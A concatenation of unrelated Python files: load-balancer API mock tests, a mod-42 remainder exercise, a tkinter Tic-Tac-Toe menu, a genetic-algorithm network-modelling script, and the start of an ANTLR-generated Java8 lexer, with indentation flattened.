original = self.node[0]
expected = original.copy()
change = {
"condition": "DISABLED",
"weight": 100,
"type": "SECONDARY"
}
expected.update(change)
# sanity check to make sure we're actually changing stuff
self.assertTrue(all([change[k] != original[k] for k in change.keys()]))
resp, body = _update_clb_node(
self, self.helper, self.lb_id, self.node[0]["id"],
json.dumps({"node": change}).encode("utf-8"),
request_func=request_with_content)
self.assertEqual(resp.code, 202)
self.assertEqual(body, b"")
self.assertEqual(self._get_nodes(self.lb_id)[0], expected)
# check if feed is updated
d = request(
self, self.root, b"GET",
"{0}/loadbalancers/{1}/nodes/{2}.atom".format(self.uri, self.lb_id,
self.node[0]["id"]))
feed_response = self.successResultOf(d)
self.assertEqual(feed_response.code, 200)
self.assertEqual(
self.successResultOf(treq.content(feed_response)).decode("utf-8"),
("<feed xmlns=\"http://www.w3.org/2005/Atom\"><entry>"
"<summary>Node successfully updated with address: '127.0.0.1', "
"port: '80', weight: '100', condition: 'DISABLED'</summary>"
"<updated>1970-01-01T00:00:00.000000Z</updated></entry></feed>"))
def test_get_feed_node_404(self):
"""
Getting feed of non-existent node returns 404 with "Node not found"
XML
"""
d = request(
self, self.root, b"GET",
"{0}/loadbalancers/{1}/nodes/{2}.atom".format(self.uri, self.lb_id, 0))
feed_response = self.successResultOf(d)
self.assertEqual(feed_response.code, 404)
self.assertEqual(
self.successResultOf(treq.content(feed_response)).decode("utf-8"),
('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
'<itemNotFound xmlns="http://docs.openstack.org/loadbalancers/api/v1.0" code="404">'
'<message>Node not found</message></itemNotFound>'))
def test_get_feed_clb_404(self):
"""
Getting feed of node of non-existent CLB returns 404 with
"load balancer not found" XML
"""
d = request(
self, self.root, b"GET",
"{0}/loadbalancers/{1}/nodes/{2}.atom".format(self.uri, 0, 0))
feed_response = self.successResultOf(d)
self.assertEqual(feed_response.code, 404)
self.assertEqual(
self.successResultOf(treq.content(feed_response)).decode("utf-8"),
('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
'<itemNotFound xmlns="http://docs.openstack.org/loadbalancers/api/v1.0" code="404">'
'<message>Load balancer not found</message></itemNotFound>'))
class LoadbalancerAPINegativeTests(SynchronousTestCase):
"""
Tests for the Loadbalancer plugin API for error injection
"""
def setUp(self):
"""
Create a :obj:`MimicCore` with :obj:`LoadBalancerApi` as the only plugin
"""
helper = APIMockHelper(self, [LoadBalancerApi()])
self.root = helper.root
self.uri = helper.uri
self.helper = helper
def _create_loadbalancer_for_given_metadata(self, metadata=None):
"""
Helper method to create a load balancer with the given metadata
"""
create_lb = request(
self, self.root, b"POST", self.uri + '/loadbalancers',
json.dumps({
"loadBalancer": {
"name": "test_lb",
"protocol": "HTTP",
"virtualIps": [{"type": "PUBLIC"}],
"metadata": metadata or []
}
}).encode("utf-8")
)
create_lb_response = self.successResultOf(create_lb)
return create_lb_response
def _add_node_to_lb(self, lb_id):
"""
Adds a node to the load balancer and returns the response object
"""
create_node = request(
self, self.root, b"POST", self.uri + '/loadbalancers/'
+ str(lb_id) + '/nodes',
json.dumps({"nodes": [{"address": "127.0.0.1",
"port": 80,
"condition": "ENABLED",
"type": "PRIMARY"}]}).encode("utf-8")
)
create_node_response = self.successResultOf(create_node)
return create_node_response
def _get_loadbalancer(self, lb_id):
"""
Makes the `GET` call for the given loadbalancer id and returns the
load balancer object.
"""
get_lb = request(self, self.root, b"GET", self.uri + '/loadbalancers/' + str(lb_id))
get_lb_response = self.successResultOf(get_lb)
get_lb_response_body = self.successResultOf(treq.json_content(get_lb_response))
return get_lb_response_body
def _delete_loadbalancer(self, lb_id):
"""
Deletes the given load balancer id and returns the response
"""
delete_lb = request(self, self.root, b"DELETE", self.uri + '/loadbalancers/' +
str(lb_id))
return self.successResultOf(delete_lb)
def _create_loadbalancer(self, metadata):
"""Create a load balancer and return the response body."""
create_response = self._create_loadbalancer_for_given_metadata(metadata)
self.assertEqual(create_response.code, 202)
create_lb_response_body = self.successResultOf(treq.json_content(create_response))
lb = create_lb_response_body["loadBalancer"]
self.assertEqual(lb["status"], "ACTIVE")
return lb
def test_create_load_balancer_in_building_state(self):
"""
Test to verify the created load balancer remains in building
        state for the time in seconds specified in the metadata.
Adding a node to a lb in BUILD status results in 422.
"""
metadata = [{"key": "lb_building", "value": 1}]
create_response = self._create_loadbalancer_for_given_metadata(metadata)
self.assertEqual(create_response.code, 202)
create_lb_response_body = self.successResultOf(treq.json_content(create_response))
lb = create_lb_response_body["loadBalancer"]
self.assertEqual(lb["status"], "BUILD")
create_node_response = self._add_node_to_lb(lb["id"])
self.assertEqual(create_node_response.code, 422)
def test_load_balancer_goes_into_error_state_when_adding_node(self):
"""
Test to verify a load balancer goes into error state when adding a node.
Adding a node to a loadbalancer in ERROR state results in 422.
And such a load balancer can only be deleted.
"""
metadata = [{"key": "lb_error_state", "value": "error"}]
lb = self._create_loadbalancer(metadata)
create_node_response = self._add_node_to_lb(lb["id"])
self.assertEqual(create_node_response.code, 202)
        # get the load balancer after adding a node and verify it is in ERROR state
errored_lb = self._get_loadbalancer(lb["id"])
self.assertEqual(errored_lb["loadBalancer"]["status"], "ERROR")
# adding another node to a lb in ERROR state, results in 422
create_node_response = self._add_node_to_lb(lb["id"])
self.assertEqual(create_node_response.code, 422)
# An lb in ERROR state can be deleted
delete_lb = request(self, self.root, b"DELETE", self.uri + '/loadbalancers/' +
str(lb["id"]))
delete_lb_response = self.successResultOf(delete_lb)
self.assertEqual(delete_lb_response.code, 202)
def test_load_balancer_goes_into_pending_update_state(self):
"""
Test to verify a load balancer goes into PENDING-UPDATE state, for
the given time in seconds when any action other than DELETE is performed
on the lb.
Adding a node to a loadbalancer in PENDING-UPDATE state results in 422.
And such a load balancer can be deleted.
"""
metadata = [{"key": "lb_pending_update", "value": 30}]
lb = self._create_loadbalancer(metadata)
create_node_response = self._add_node_to_lb(lb["id"])
self.assertEqual(create_node_response.code, 202)
        # get the load balancer after adding a node and verify it is in PENDING-UPDATE state
errored_lb = self._get_loadbalancer(lb["id"])
self.assertEqual(errored_lb["loadBalancer"]["status"], "PENDING-UPDATE")
# Trying to add/list/delete node on a lb in PENDING-UPDATE state, results in 422
create_node_response = self._add_node_to_lb(lb["id"])
self.assertEqual(create_node_response.code, 422)
delete_nodes = request(
self, self.root, b"DELETE", self.uri + '/loadbalancers/' +
str(lb["id"]) + '/nodes/123')
self.assertEqual(self.successResultOf(delete_nodes).code, 422)
# An lb in PENDING-UPDATE state can be deleted
delete_lb = request(self, self.root, b"DELETE", self.uri + '/loadbalancers/' +
str(lb["id"]))
delete_lb_response = self.successResultOf(delete_lb)
self.assertEqual(delete_lb_response.code, 202)
def test_load_balancer_reverts_from_pending_update_state(self):
"""
Test to verify a load balancer goes into PENDING-UPDATE state, for
the given time in seconds.
"""
metadata = [{"key": "lb_pending_update", "value": 1}]
lb = self._create_loadbalancer(metadata)
create_node_response = self._add_node_to_lb(lb["id"])
self.assertEqual(create_node_response.code, 202)
        # get the load balancer after adding a node and verify it is in PENDING-UPDATE state
errored_lb = self._get_loadbalancer(lb["id"])
self.assertEqual(errored_lb["loadBalancer"]["status"], "PENDING-UPDATE")
self.helper.clock.advance(1.0)
        # get the load balancer after adding a node and verify it is in ACTIVE state
errored_lb = self._get_loadbalancer(lb["id"])
self.assertEqual(errored_lb["loadBalancer"]["status"], "ACTIVE")
def test_delete_load_balancer_and_pending_delete_state(self):
"""
Test to verify a load balancer goes into PENDING-DELETE state, for
the given time in seconds and then goes into a DELETED status.
Also, verify when a load balancer in PENDING-DELETE or DELETED status
is deleted, response code 400 is returned.
"""
metadata = [{"key": "lb_pending_delete", "value": 1}]
lb = self._create_loadbalancer(metadata)
# Verify the lb status goes into PENDING-DELETE
del_lb_response = self._delete_loadbalancer(lb["id"])
self.assertEqual(del_lb_response.code, 202)
del_lb_content = self.successResultOf(treq.content(del_lb_response))
self.assertEqual(del_lb_content, b'')
deleted_lb = self._get_loadbalancer(lb["id"])
self.assertEqual(deleted_lb["loadBalancer"]["status"], "PENDING-DELETE")
# Trying to delete a lb in PENDING-DELETE status results in 400
self.assertEqual(self._delete_loadbalancer(lb["id"]).code, 400)
self.helper.clock.advance(1.0000001)
# Lb goes into DELETED status after time specified in metadata
deleted_lb = self._get_loadbalancer(lb["id"])
self.assertEqual(deleted_lb["loadBalancer"]["status"], "DELETED")
# Trying to delete a lb in DELETED status results in 400
self.assertEqual(self._delete_loadbalancer(lb["id"]).code, 400)
# GET node on load balancer in DELETED status results in 410
get_node = request(
self, self.root, b"GET", self.uri + '/loadbalancers/' +
str(lb["id"]) + '/nodes/123')
get_node_response = self.successResultOf(get_node)
self.assertEqual(get_node_response.code, 410)
# GET node feed on load balancer in DELETED status results in 410
node_feed = request(
self, self.root, b"GET", self.uri + '/loadbalancers/' +
str(lb["id"]) + '/nodes/123.atom')
node_feed_response = self.successResultOf(node_feed)
self.assertEqual(node_feed_response.code, 410)
# List node on load balancer in DELETED status results in 410
list_nodes = request(
self, self.root, b"GET", self.uri + '/loadbalancers/' + str(lb["id"])
+ '/nodes')
self.assertEqual(self.successResultOf(list_nodes).code, 410)
# Progress past "deleting now"
self.helper.clock.advance(4000)
list_nodes = request(
self, self.root, b"GET", self.uri + '/loadbalancers/' + str(lb["id"])
+ '/nodes')
self.assertEqual(self.successResultOf(list_nodes).code, 404)
def test_bulk_delete_empty_list_takes_precedence_over_immutable(self):
"""
When bulk deleting no nodes, the error indicating nodes must be specified
is returned even when the LB is not ACTIVE.
"""
metadata = [{"key": "lb_pending_update", "value": 30}]
lb = self._create_loadbalancer(metadata)
# Add a node, which should put it into PENDING-UPDATE
create_node_response = self._add_node_to_lb(lb["id"])
self.assertEqual(create_node_response.code, 202)
updated_lb = self._get_loadbalancer(lb["id"])
self.assertEqual(updated_lb["loadBalancer"]["status"], "PENDING-UPDATE")
# Now, trying to bulk-delete an empty list of nodes will still return
# the empty-nodes error.
response, body = _bulk_delete(self, self.root, self.uri, lb['id'], [])
self.assertEqual(response.code, 400)
self.assertEqual(
body,
{'code': 400,
'message': "Must supply one or more id's to process this request."})
def test_bulk_delete_not_active(self):
"""
When bulk deleting nodes while the LB is not ACTIVE, a special error is
returned, even when some of the nodes are invalid.
"""
metadata = [{"key": "lb_pending_update", "value": 30}]
lb = self._create_loadbalancer(metadata)
# Add a node, which should put it into PENDING-UPDATE
create_node_response = self._add_node_to_lb(lb["id"])
self.assertEqual(create_node_response.code, 202)
updated_lb = self._get_loadbalancer(lb["id"])
self.assertEqual(updated_lb["loadBalancer"]["status"], "PENDING-UPDATE")
# Now, trying to bulk-delete nodes (including invalid ones) will cause
# it to return the special error
response, body = _bulk_delete(
self, self.root, self.uri, lb['id'], [100, 200])
self.assertEqual(response.code, 422)
self.assertEqual(
body,
{u'message': u'LoadBalancer is not ACTIVE', u'code': 422})
def test_updating_node_loadbalancer_state(self):
"""
If the load balancer is not active, when updating a node a 422 error
is returned.
"""
metadata = [{"key": "lb_pending_update", "value": 30}]
lb_id = self._create_loadbalancer(metadata)["id"]
# Add a node, which should put it into PENDING-UPDATE
create_node_response = self._add_node_to_lb(lb_id)
self.assertEqual(create_node_response.code, 202)
updated_lb = self._get_loadbalancer(lb_id)
self.assertEqual(updated_lb["loadBalancer"]["status"],
"PENDING-UPDATE")
node = self.successResultOf(treq.json_content(create_node_response))
node_id = node["nodes"][0]["id"]
resp, body = _update_clb_node(self, self.helper, lb_id, node_id,
{"node": {"weight": 1}})
self.assertEqual((body, resp.code),
considered_immutable_error("PENDING-UPDATE", lb_id))
|
# Given two natural numbers A and B, A%B is the remainder when A is divided by B.
# Read 10 numbers and compute each one's remainder when divided by 42.
# Then write a program that prints how many distinct values there are among them.
arr = []
new_arr = []
for i in range(10):
number = int(input())
arr.append(number%42)
for i in arr:
if i not in new_arr:
new_arr.append(i)
print(len(new_arr))
|
import tkinter as tk
import AI
TITLE_FONT = ("Helvetica", 24, "bold")
class tictactoe_game(tk.Tk):
def __init__(self, *args, **kwargs):
tk.Tk.__init__(self, *args, **kwargs)
path = "bg.jpg"
container = tk.Frame(self)
container.pack(side="top", fill="both", expand=True)
container.grid_rowconfigure(0, weight=1)
container.grid_columnconfigure(0, weight=1)
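        # All page frames are stacked in the same grid cell; show_frame()
        # raises the requested page to the top of the stack.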
self.frames = {}
for F in (menu, roll_credits):# input frame name here
page_name = F.__name__
frame = F(parent=container, controller=self)
self.frames[page_name] = frame
frame.grid(row=0, column=0, sticky="nsew")
self.show_frame("menu")
def show_frame(self, page_name):
'''Show a frame for the given page name'''
frame = self.frames[page_name]
frame.tkraise()
class menu(tk.Frame):
def __init__(self, parent, controller):
tk.Frame.__init__(self, parent, bg="white")
self.controller = controller
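        # Only the Credits button has a command wired up; the other buttons
        # currently do nothing when clicked.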
        tk.Label(self, bg="black", fg="white").pack(fill="both", expand=True)
        tk.Label(self, text="Tic-Tac-Toe", font=TITLE_FONT, bg="black", fg="white").pack(fill="both", expand=True)
        tk.Label(self, bg="black", fg="white").pack(fill="both", expand=True)
        tk.Button(self, text="Single Player Mode", bg="black", fg="white").pack(fill="both", expand=True)
        tk.Button(self, text="Multi-Player Mode", bg="black", fg="white").pack(fill="both", expand=True)
        tk.Button(self, text="Online Multi-Player Mode", bg="black", fg="white").pack(fill="both", expand=True)
        tk.Button(self, text="Credits", bg="black", fg="white", command=lambda: controller.show_frame("roll_credits")).pack(fill="both", expand=True)
        tk.Button(self, text="Exit Game", bg="black", fg="white").pack(fill="both", expand=True)
        tk.Label(self, bg="black", fg="white").pack(fill="both", expand=True)
class roll_credits(tk.Frame):
def __init__(self, parent, controller):
tk.Frame.__init__(self, parent, bg="white")
self.controller = controller
        tk.Label(self, bg="black", fg="white").pack(fill="both", expand=True)
        tk.Label(self, text="Credits", font=TITLE_FONT, bg="black", fg="white").pack(fill="both", expand=True)
        tk.Label(self, bg="black", fg="white").pack(fill="both", expand=True)
        tk.Label(self, text="Created by", bg="black", fg="white").pack(fill="both", expand=True)
        tk.Label(self, text="Kyle Speke + Taylor Southorn", bg="black", fg="white").pack(fill="both", expand=True)
        tk.Label(self, text="Harry Hudson + Ayyub Lindroos", bg="black", fg="white").pack(fill="both", expand=True)
        tk.Label(self, text="Faizan Ahmed", bg="black", fg="white").pack(fill="both", expand=True)
        tk.Label(self, bg="black", fg="white").pack(fill="both", expand=True)
        tk.Button(self, text="Return", bg="black", fg="white", command=lambda: controller.show_frame("menu")).pack(fill="both", expand=True)
if __name__ == "__main__":
app = tictactoe_game()
app.title("Tic-Tac-Toe")
|
"""
@author: David
inspired by Telmo Menezes's work : telmomenezes.com
"""
import sys
import matplotlib
matplotlib.use('Agg')
import numpy as np
from multiprocessing import Pool
import network_evaluation as ne
import genetic_algorithm as ga
import warnings
import os
import random
np.seterr('ignore')
warnings.filterwarnings("ignore")
'''
This is the main file of the program:
it stores the data from the real network needed by the chosen evaluation method,
defines the genetic algorithm and its grammar,
and runs it.
'''
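# Command-line arguments (read from sys.argv in main()):
#   argv[1]: number_of_nodes (int)
#   argv[2]: name/path of the real network file (used as data_path)
#   argv[3]: output directory for result.xml, stats.txt and trees.jpeg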
def main():
number_of_nodes = int(sys.argv[1])
name = sys.argv[2]
resdir = sys.argv[3]
#network_name = name.replace(".gexf","")
network_name = name
data_path = name
#data_path = "data/"+network_name
#res_path = "data/"+network_name+"_"+str(number_of_nodes)+"_u"
#if not os.path.isfile(res_path+'_stats.txt'):
if not os.path.exists(resdir):
os.mkdir(resdir)
results_path = resdir + "/result.xml" #sys.argv[3] #res_path+"_results.xml"
stats_path = resdir + "/stats.txt" #res_path+'_stats.txt'
dot_path = resdir + "/trees.jpeg"
nb_generations = 40
freq_stats = 5
evaluation_method = "communities_degrees_distances_clustering_importance"
tree_type = "with_constants"
extension = ".gexf"
multiprocessing = False
dynamic = False
    print(network_name)
network_type = "directed_unweighted"
evaluation_method = "degrees_communities_distances_clustering_importance"
ne.get_datas_from_real_network(data_path,
results_path,
name=network_name,
evaluation_method=evaluation_method,
dynamic=dynamic)
genome = ga.new_genome(
results_path,
name=network_name,
data_path=data_path,
evaluation_method=evaluation_method,
dynamic=dynamic,
tree_type=tree_type,
network_type=network_type,
extension=extension,
number_of_nodes = number_of_nodes
)
# optional arguments for evolve :
# *nb_generations : number of generations of the evolution
# possible values : int > 0 : default : 100
# *freq_stats : number of generations between two prints of statistics
# possible values : int > 0 : default : 5
# *stats_path : path to the file where the stats will be printed
    # *multiprocessing : whether or not to use multiprocessing
# possible values : True False
ga.evolve(genome, stats_path=stats_path, dot_path=dot_path, nb_generations=nb_generations, freq_stats=freq_stats,
multiprocessing=multiprocessing)
if __name__ == "__main__":
#files =[file for file in os.listdir("data") if ".gexf" in file]
# files = [sys.argv[2]]
# random.shuffle(files)
# try :
# multiproc = sys.argv[2]
# except :
# multiproc = False
# if not multiproc :
# for file in files :
main()
# else :
# pool = Pool(16)
# pool.map(main, files)
# pool.close()
|
# Generated from ./Java8.g4 by ANTLR 4.7.1
# encoding: utf-8
from __future__ import print_function
from antlr4 import *
from io import StringIO
import sys
def serializedATN():
with StringIO() as buf:
buf.write(u"\3\u608b\ua72a\u8133\ub9ed\u417c\u3be7\u7786\u5964\2")
buf.write(u"m\u044c\b\1\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4")
buf.write(u"\7\t\7\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r")
buf.write(u"\t\r\4\16\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22")
buf.write(u"\4\23\t\23\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27\4")
buf.write(u"\30\t\30\4\31\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35")
buf.write(u"\t\35\4\36\t\36\4\37\t\37\4 \t \4!\t!\4\"\t\"\4#\t#\4")
buf.write(u"$\t$\4%\t%\4&\t&\4\'\t\'\4(\t(\4)\t)\4*\t*\4+\t+\4,\t")
buf.write(u",\4-\t-\4.\t.\4/\t/\4\60\t\60\4\61\t\61\4\62\t\62\4\63")
buf.write(u"\t\63\4\64\t\64\4\65\t\65\4\66\t\66\4\67\t\67\48\t8\4")
buf.write(u"9\t9\4:\t:\4;\t;\4<\t<\4=\t=\4>\t>\4?\t?\4@\t@\4A\tA")
buf.write(u"\4B\tB\4C\tC\4D\tD\4E\tE\4F\tF\4G\tG\4H\tH\4I\tI\4J\t")
buf.write(u"J\4K\tK\4L\tL\4M\tM\4N\tN\4O\tO\4P\tP\4Q\tQ\4R\tR\4S")
buf.write(u"\tS\4T\tT\4U\tU\4V\tV\4W\tW\4X\tX\4Y\tY\4Z\tZ\4[\t[\4")
buf.write(u"\\\t\\\4]\t]\4^\t^\4_\t_\4`\t`\4a\ta\4b\tb\4c\tc\4d\t")
buf.write(u"d\4e\te\4f\tf\4g\tg\4h\th\4i\ti\4j\tj\4k\tk\4l\tl\4m")
buf.write(u"\tm\4n\tn\4o\to\4p\tp\4q\tq\4r\tr\4s\ts\4t\tt\4u\tu\4")
buf.write(u"v\tv\4w\tw\4x\tx\4y\ty\4z\tz\4{\t{\4|\t|\4}\t}\4~\t~")
buf.write(u"\4\177\t\177\4\u0080\t\u0080\4\u0081\t\u0081\4\u0082")
buf.write(u"\t\u0082\4\u0083\t\u0083\4\u0084\t\u0084\4\u0085\t\u0085")
buf.write(u"\4\u0086\t\u0086\4\u0087\t\u0087\4\u0088\t\u0088\4\u0089")
buf.write(u"\t\u0089\4\u008a\t\u008a\4\u008b\t\u008b\4\u008c\t\u008c")
buf.write(u"\4\u008d\t\u008d\4\u008e\t\u008e\4\u008f\t\u008f\4\u0090")
buf.write(u"\t\u0090\4\u0091\t\u0091\4\u0092\t\u0092\4\u0093\t\u0093")
buf.write(u"\4\u0094\t\u0094\4\u0095\t\u0095\4\u0096\t\u0096\4\u0097")
buf.write(u"\t\u0097\4\u0098\t\u0098\4\u0099\t\u0099\4\u009a\t\u009a")
buf.write(u"\3\2\3\2\3\2\3\2\3\2\3\2\3\2\3\2\3\2\3\3\3\3\3\3\3\3")
buf.write(u"\3\3\3\3\3\3\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\5\3\5")
buf.write(u"\3\5\3\5\3\5\3\5\3\6\3\6\3\6\3\6\3\6\3\7\3\7\3\7\3\7")
buf.write(u"\3\7\3\b\3\b\3\b\3\b\3\b\3\b\3\t\3\t\3\t\3\t\3\t\3\n")
buf.write(u"\3\n\3\n\3\n\3\n\3\n\3\13\3\13\3\13\3\13\3\13\3\13\3")
buf.write(u"\f\3\f\3\f\3\f\3\f\3\f\3\f\3\f\3\f\3\r\3\r\3\r\3\r\3")
buf.write(u"\r\3\r\3\r\3\r\3\16\3\16\3\16\3\17\3\17\3\17\3\17\3\17")
buf.write(u"\3\17\3\17\3\20\3\20\3\20\3\20\3\20\3\21\3\21\3\21\3")
buf.write(u"\21\3\21\3\22\3\22\3\22\3\22\3\22\3\22\3\22\3\22\3\23")
buf.write(u"\3\23\3\23\3\23\3\23\3\23\3\24\3\24\3\24\3\24\3\24\3")
buf.write(u"\24\3\24\3\24\3\25\3\25\3\25\3\25\3\25\3\25\3\26\3\26")
buf.write(u"\3\26\3\26\3\27\3\27\3\27\3\30\3\30\3\30\3\30\3\30\3")
buf.write(u"\31\3\31\3\31\3\31\3\31\3\31\3\31\3\31\3\31\3\31\3\31")
buf.write(u"\3\32\3\32\3\32\3\32\3\32\3\32\3\32\3\33\3\33\3\33\3")
buf.write(u"\33\3\33\3\33\3\33\3\33\3\33\3\33\3\33\3\34\3\34\3\34")
buf.write(u"\3\34\3\35\3\35\3\35\3\35\3\35\3\35\3\35\3\35\3\35\3")
buf.write(u"\35\3\36\3\36\3\36\3\36\3\36\3\37\3\37\3\37\3\37\3\37")
buf.write(u"\3\37\3\37\3 \3 \3 \3 \3!\3!\3!\3!\3!\3!\3!\3!\3\"\3")
buf.write(u"\"\3\"\3\"\3\"\3\"\3\"\3\"\3#\3#\3#\3#\3#\3#\3#\3#\3")
buf.write(u"#\3#\3$\3$\3$\3$\3$\3$\3$\3%\3%\3%\3%\3%\3%\3%\3&\3&")
buf.write(u"\3&\3&\3&\3&\3\'\3\'\3\'\3\'\3\'\3\'\3\'\3(\3(\3(\3(")
buf.write(u"\3(\3(\3(\3(\3(\3)\3)\3)\3)\3)\3)\3*\3*\3*\3*\3*\3*\3")
buf.write(u"*\3+\3+\3+\3+\3+\3+\3+\3+\3+\3+\3+\3+\3+\3,\3,\3,\3,")
buf.write(u"\3,\3-\3-\3-\3-\3-\3-\3.\3.\3.\3.\3.\3.\3.\3/\3/\3/\3")
buf.write(u"/\3/\3/\3/\3/\3/\3/\3\60\3\60\3\60\3\60\3\61\3\61\3\61")
buf.write(u"\3\61\3\61\3\62\3\62\3\62\3\62\3\62\3\62\3\62\3\62\3")
buf.write(u"\62\3\63\3\63\3\63\3\63\3\63\3\63\3\64\3\64\3\64\3\64")
buf.write(u"\5\64\u028d\n\64\3\65\3\65\5\65\u0291\n\65\3\66\3\66")
buf.write(u"\5\66\u0295\n\66\3\67\3\67\5\67\u0299\n\67\38\38\58\u029d")
buf.write(u"\n8\39\39\3:\3:\3:\5:\u02a4\n:\3:\3:\3:\5:\u02a9\n:\5")
buf.write(u":\u02ab\n:\3;\3;\5;\u02af\n;\3;\5;\u02b2\n;\3<\3<\5<")
buf.write(u"\u02b6\n<\3=\3=\3>\6>\u02bb\n>\r>\16>\u02bc\3?\3?\5?")
buf.write(u"\u02c1\n?\3@\6@\u02c4\n@\r@\16@\u02c5\3A\3A\3A\3A\3B")
buf.write(u"\3B\5B\u02ce\nB\3B\5B\u02d1\nB\3C\3C\3D\6D\u02d6\nD\r")
buf.write(u"D\16D\u02d7\3E\3E\5E\u02dc\nE\3F\3F\5F\u02e0\nF\3F\3")
buf.write(u"F\3G\3G\5G\u02e6\nG\3G\5G\u02e9\nG\3H\3H\3I\6I\u02ee")
buf.write(u"\nI\rI\16I\u02ef\3J\3J\5J\u02f4\nJ\3K\3K\3K\3K\3L\3L")
buf.write(u"\5L\u02fc\nL\3L\5L\u02ff\nL\3M\3M\3N\6N\u0304\nN\rN\16")
buf.write(u"N\u0305\3O\3O\5O\u030a\nO\3P\3P\5P\u030e\nP\3Q\3Q\3Q")
buf.write(u"\5Q\u0313\nQ\3Q\5Q\u0316\nQ\3Q\5Q\u0319\nQ\3Q\3Q\3Q\5")
buf.write(u"Q\u031e\nQ\3Q\5Q\u0321\nQ\3Q\3Q\3Q\5Q\u0326\nQ\3Q\3Q")
buf.write(u"\3Q\5Q\u032b\nQ\3R\3R\3R\3S\3S\3T\5T\u0333\nT\3T\3T\3")
buf.write(u"U\3U\3V\3V\3W\3W\3W\5W\u033e\nW\3X\3X\5X\u0342\nX\3X")
buf.write(u"\3X\3X\5X\u0347\nX\3X\3X\5X\u034b\nX\3Y\3Y\3Y\3Z\3Z\3")
buf.write(u"[\3[\3[\3[\3[\3[\3[\3[\3[\5[\u035b\n[\3\\\3\\\3\\\3\\")
buf.write(u"\3\\\3\\\3\\\3\\\5\\\u0365\n\\\3]\3]\3^\3^\5^\u036b\n")
buf.write(u"^\3^\3^\3_\6_\u0370\n_\r_\16_\u0371\3`\3`\5`\u0376\n")
buf.write(u"`\3a\3a\3a\3a\5a\u037c\na\3b\3b\3b\3b\3b\3b\3b\3b\3b")
buf.write(u"\3b\3b\5b\u0389\nb\3c\3c\3d\3d\6d\u038f\nd\rd\16d\u0390")
buf.write(u"\3d\3d\3d\3d\3d\3e\3e\3e\3e\3e\3f\3f\3g\3g\3h\3h\3i\3")
buf.write(u"i\3j\3j\3k\3k\3l\3l\3m\3m\3n\3n\3o\3o\3p\3p\3q\3q\3r")
buf.write(u"\3r\3s\3s\3t\3t\3u\3u\3v\3v\3v\3w\3w\3w\3x\3x\3x\3y\3")
buf.write(u"y\3y\3z\3z\3z\3{\3{\3{\3|\3|\3|\3}\3}\3}\3~\3~\3\177")
buf.write(u"\3\177\3\u0080\3\u0080\3\u0081\3\u0081\3\u0082\3\u0082")
buf.write(u"\3\u0083\3\u0083\3\u0084\3\u0084\3\u0085\3\u0085\3\u0086")
buf.write(u"\3\u0086\3\u0086\3\u0087\3\u0087\3\u0087\3\u0088\3\u0088")
buf.write(u"\3\u0088\3\u0089\3\u0089\3\u0089\3\u008a\3\u008a\3\u008a")
buf.write(u"\3\u008b\3\u008b\3\u008b\3\u008c\3\u008c\3\u008c\3\u008d")
buf.write(u"\3\u008d\3\u008d\3\u008e\3\u008e\3\u008e\3\u008f\3\u008f")
buf.write(u"\3\u008f\3\u0090\3\u0090\3\u0090\3\u0090\3\u0091\3\u0091")
buf.write(u"\3\u0091\3\u0091\3\u0092\3\u0092\3\u0092\3\u0092\3\u0092")
buf.write(u"\3\u0093\3\u0093\7\u0093\u0412\n\u0093\f\u0093\16\u0093")
buf.write(u"\u0415\13\u0093\3\u0094\3\u0094\3\u0094\3\u0094\3\u0094")
buf.write(u"\3\u0094\5\u0094\u041d\n\u0094\3\u0095\3\u0095\3\u0095")
buf.write(u"\3\u0095\3\u0095\3\u0095\5\u0095\u0425\n\u0095\3\u0096")
buf.write(u"\3\u0096\3\u0097\3\u0097\3\u0097\3\u0097\3\u0098\6\u0098")
buf.write(u"\u042e\n\u0098\r\u0098\16\u0098\u042f\3\u0098\3\u0098")
buf.write(u"\3\u0099\3\u0099\3\u0099\3\u0099\7\u0099\u0438\n\u0099")
buf.write(u"\f\u0099\16\u0099\u043b\13\u0099\3\u0099\3\u0099\3\u0099")
buf.write(u"\3\u0099\3\u0099\3\u009a\3\u009a\3\u009a\3\u009a\7\u009a")
buf.write(u"\u0446\n\u009a\f\u009a\16\u009a\u0449\13\u009a\3\u009a")
buf.write(u"\3\u009a\3\u0439\2\u009b\3\3\5\4\7\5\t\6\13\7\r\b\17")
buf.write(u"\t\21\n\23\13\25\f\27\r\31\16\33\17\35\20\37\21!\22#")
buf.write(u"\23%\24\'\25)\26+\27-\30/\31\61\32\63\33\65\34\67\35")
buf.write(u"9\36;\37= ?!A\"C#E$G%I&K\'M(O)Q*S+U,W-Y.[/]\60_\61a\62")
buf.write(u"c\63e\64g\65i\2k\2m\2o\2q\2s\2u\2w\2y\2{\2}\2\177\2\u0081")
buf.write(u"\2\u0083\2\u0085\2\u0087\2\u0089\2\u008b\2\u008d\2\u008f")
buf.write(u"\2\u0091\2\u0093\2\u0095\2\u0097\2\u0099\2\u009b\2\u009d")
buf.write(u"\2\u009f\66\u00a1\2\u00a3\2\u00a5\2\u00a7\2\u00a9\2\u00ab")
buf.write(u"\2\u00ad\2\u00af\2\u00b1\2\u00b3\2\u00b5\67\u00b78\u00b9")
buf.write(u"\2\u00bb9\u00bd\2\u00bf\2\u00c1\2\u00c3\2\u00c5\2\u00c7")
buf.write(u"\2\u00c9:\u00cb;\u00cd<\u00cf=\u00d1>\u00d3?\u00d5@\u00d7")
buf.write(u"A\u00d9B\u00dbC\u00ddD\u00dfE\u00e1F\u00e3G\u00e5H\u00e7")
buf.write(u"I\u00e9J\u00ebK\u00edL\u00efM\u00f1N\u00f3O\u00f5P\u00f7")
buf.write(u"Q\u00f9R\u00fbS\u00fdT\u00ffU\u0101V\u0103W\u0105X\u0107")
buf.write(u"Y\u0109Z\u010b[\u010d\\\u010f]\u0111^\u0113_\u0115`\u0117")
buf.write(u"a\u0119b\u011bc\u011dd\u011fe\u0121f\u0123g\u0125h\u0127")
buf.write(u"\2\u0129\2\u012bi\u012dj\u012fk\u0131l\u0133m\3\2\30")
buf.write(u"\4\2NNnn\3\2\63;\4\2ZZzz\5\2\62;CHch\3\2\629\4\2DDdd")
